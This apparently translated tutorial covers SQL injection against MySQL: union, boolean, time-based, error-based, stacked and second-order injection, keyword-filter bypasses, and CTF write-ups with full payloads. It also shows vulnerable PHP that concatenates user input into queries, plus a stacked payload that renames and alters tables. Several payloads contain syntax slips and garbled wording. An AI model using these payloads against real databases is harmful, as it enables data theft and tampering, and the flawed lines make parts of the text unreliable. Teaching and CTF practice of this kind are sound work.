Basic knowledge of SQL injection

Article Directory

Basic knowledge of SQL injection

1. Database related knowledge

1.1information_schema: MySql default database

SCHEMATA:
Store the library name of all databases created by the user, record the field name of the
database. Library name ----- SCHEMA_NAME
TABLES:
Store the library names and table names of all databases created by the user, and the corresponding field names.
Library name-----TABLE_SCHEMA Table name----TABLE_NAME
COLUMNS:
Store the library name, table name, and field name of all databases created by the user.
Library name-----TABLE_SCHEMA table name----TABLE_NAME
field name-----COLUMN_NAME

1.2Mysq query statement

SELECT field name FROM library name. Table name
SELECT field name FROM library name. Table name WHERE Known field name='Known value'
SELECT field name FROM library name. Table name WHERE Known field name 1='Known value 1'AND Known field name 2='Known value 2'

2. Attack method

2.1 Union injection

order by the number of field data table queries
Example: id = 1 order by 3 page results id = 1 the same, id = 1 order by. 4 page results id = 1 are different, the number of fields is 3.
Union select burst display point
Example: id=-1 union select 1, 2, 3 page returns 2, 3, it means that the position of 2 and 3 can enter MySQL statement di
MySQL statement
example: first use the database() function at position 2 to query the current database name-'sql', then query a table name of the database'emails', and then query the field name after the database name and table name are obtained. email_id', finally get the required data

id = 1 union select 1,database(),3;

id = 1 union select 1,tabel_name from information_schema.tables where table_schema='sql' limit 0,1;,3

id = 1 union select 1,column_name from  information_schema.columns  where table_schema='sql' and table_name='emails' limit 0,1;,3

id = 1 union select 1,email_id from sql.emails limit 0,1;,3

2.2Boolean injection

When the page does not return data in the database, try Boolean injection
Determine the length of the database, try different values of n, and get the database length from the page return status

id = '1'  and length(database()) >= n --+

Judge character by character to obtain the database library name, the variable can be blasted with burpsuit, and the same method is used to determine whether the table name is

id = '1' and substr(database(),1,1)='t' --+

id = '1' and substr((select table_name from information_schema.tables where table_schema= 'sql' limit 0,1)1,1))='e' --+

Time injection form

id ='1' and if(substr((select table_name from information_schema.tables where table_schema= 'sql' limit 0,1)1,1))='e',sleep(3),1) --+

2.3 Error injection

According to the error message returned on the page, use functions such as updataxml() to obtain data.
Example: updatexml() to obtain the table name of the database test

  ' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='test' limit 0,1),0x7e),1)--+

2.4 Stacked query injection

1. Judgment condition: If you use id=1' to display mysql error id=1'# If the page returns to normal results, you can try stack injection
2. Inject code example

id = '1';select if(substr(select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e',sleep(3),1)%23

2.5 Secondary injection

1.php registration page code analysis

<?php
$con=mysqli_connect("localhost","root","root","sql");
if(mysqli_connect_errno())
{
    
    
echo "连接失败：".mysqli_connect_error();
}
$username = $_GET['username'];
$password = $_GET['password'];
$result = mysqli_query($con,"insert into users(`username`,`password`) values('".addslashes($username)."','"md5($password)."')");
echo "新id为：".mysqli_insert_id($con);
?>

The page uses GET to obtain the password and username parameters and splice them into the insert statement to insert into the database
The parameter usernmae uses the addslashes($username) function to escape
addslashes() Example: the
escape character o'reilly ----> o'\reilly keeps the data as o'reily when inserted into the database
The parameter password is encrypted with md5 and inserted into the database
After registration, it will return a login id 2.
php access page code analysis

<?php
$con=mysqli_connect("localhost","root","123456","test");
if (mysqli_connect_errno())
{
    
    
echo "连接失败：".mysqli_connect_error();
}
$id =intval($_GET['id']);
$result = mysqli_query($con,"select *from users where `id`=".$id);
$row = mysqli_fetch_array($result);
$username = $row['username'];
$result2 = mysqli_query($con,"select * from person where `username`='".$username."'");
if($row2 = mysqli_fetch_array($result2)){
    
    
echo $row2['username'].":".$row2['money'];
}
else{
    
    
echo mysqli_error($con);}
?>

Use Get to obtain the parameter id, and use the intval() function to ensure that it is an integer spliced into the SQL statement to query the username in the users table
Then go to the person table to query the data corresponding to username

Injection example
Use the error of test' in 2.php to query the content after the union
1. First try 1.php?username=test' The ID returned is 21, and access to 2.php?id=21 will report an error
2. Then Try 1.php?usename=test' order by n%23 Visit the corresponding id interface to determine how many fields there are in the database table
3. Assuming there are 3 fields, visit 1.php?username=test' union select 1, user(),3% 23
get the new id=40 visit 2.php?id=40 get the result of user()

3.SQL injection bypass

3.1 Case bypass injection

Example:
Visiting id=1 and 1=1 page returns "no hacker", it is obvious that the keywords are filtered, try id=1 And 1=1, etc.

3.2 Double write bypass injection

Example:
Visit id = 1 and 1=1, the page reports a MySQL error. From the error message, you can see that and 1=1 becomes 1=1, and the keyword and is filtered. Use double writing to bypass id=1 aandnd 1=2;
or ==> oorr, From ==>FFromrom, etc.

4. A few simple example questions

4.1 [Geek Challenge 2019] Lovesql problem-solving ideas

Try to use union injection, first determine the number of fields 1'order by 3# and 1'order by 4#, the page returns are different, the number of all launched fields is 3.
Then try to burst 1'union select 1,2,3#
- Then try to use the position of three in union select 1,2,3# to get the information of the database

payload: 1' union select 1,2,database()#

payload: 1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="geek"#

payload: 1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name="l0ve1ysq1"#

payload: 1' union select 1,2,group_concat(password) from l0ve1ysq1#

You can get the flag: flag

4.2[Geek Challenge 2019] BabySQL

The idea is the same as 4.1, and double write bypass is added on the basis of 4.1, directly to the payload of the step.
Explosive display ->Check database ->Check table name ->Check field name ->Check password to get flag

1' uniounionn selecselectt 1,2,3#

1' uniounionn selecselectt 1,2,database()#

1' uniounionn selecselectt 1,2,group_concat(table_name) frofromm infoorrmation_schema.tables wherwheree table_schema="geek"#

1' uniounionn selecselectt 1,2,group_concat(column_name) frofromm infoorrmation_schema.columns wherwheree table_name="b4bsql"#

1' uniounionn selecselectt 1,2,group_concat(passwoorrd) frofromm b4bsql#

4.3[强网杯2019] Betting casually

Try to use union injection to find the filtering of strings
Try stack injection
Give the idea: look up the database -> look up the table name -> look up the field name

payload: 1';show databases;#

payload: 1';show tables;#

payload: 1';show columns from words;#

payload: 1';show columns from `1919810931114514`;#

It can be found that the default query table in the background is words, you can change the display to query the 1919810931114514 table

payload: 1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table  `words` change `flag` `id` varchar(100);#

1'or 1=1#Get the flag.

4.4 [Geek Challenge 2019] HardSQL (error injection)

Problem-solving ideas
1. Manually try union injection, and find that union select, spaces and other characters are filtered
2. Attempt to report error injection.
Use () instead of space filtering = use like select with uppercase
3. Get the database name, table name, and field name in turn
4. .Finally found when getting the flag

admin'or(updatexml(1,concat(0x7e,(SELECT(group_concat(password))from(H4rDsq1)),0x7e),1))#

The above injection method can only obtain part of the flag, which should be the limit of characters, add left and right.

admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))#

admin'or(updatexml(1,concat(0x7e,(SELECT(group_concat(table_name))from(information_schema.tables)where(table_schema)like("geek")),0x7e),1))#

admin'or(updatexml(1,concat(0x7e,(SELECT(group_concat(column_name))from(information_schema.columns)where(table_name)like("H4rDsq1")),0x7e),1))#

admin'or(updatexml(1,concat(0x7e,(SELECT(group_concat(right(password,25)))from(H4rDsq1)),0x7e),1))#

admin'or(updatexml(1,concat(0x7e,(SELECT(group_concat(left(password,25)))from(H4rDsq1)),0x7e),1))#

Give a flag

flag{2e150fa9-e37c-4fb6-acb7-c89f5e0cdf39}

4.5[GXYCTF2019]BabySQli

Just enter a password and grab a packet
Give a hint of base32 encoding, first base32 decoding and then base64 decoding to get
select * from user where username = ‘$name’
First judge the number of fields. I
1' orderby 3#
found that orderby was filtered, so I tried the uppercase bypass. It was successfully judged that the number of fields was 3.
Try the universal password
As expected, do not hack me!
Thought it was filtering, try various bypasses
Then I chose to look at the source code (tcl...)

if (!$result) {
    
    
		printf("Error: %s\n", mysqli_error($con));
		exit();
	}
	else{
    
    
		// echo '<pre>';
		$arr = mysqli_fetch_row($result);
		// print_r($arr);
		if($arr[1] == "admin"){
    
    
			if(md5($password) == $arr[2]){
    
    
				echo $flag;
			}
			else{
    
    
				die("wrong pass!");
			}
		}
		else{
    
    
			die("wrong user!");
		}
	}
}

Probably means that the second digit of the select result must be equal to admin, the third digit must be equal to the password md5 encryption
Select the password to be 123 md5 after encryption is 202cb962ac59075b964b07152d234b70
So the payload is as follows

username:wtcl' union select 1,'admin','202cb962ac59075b964b07152d234b70'#
password:123

get flag! Thinking of it, it’s not hard to think of a problem that can be cracked

SQL injection basic knowledge review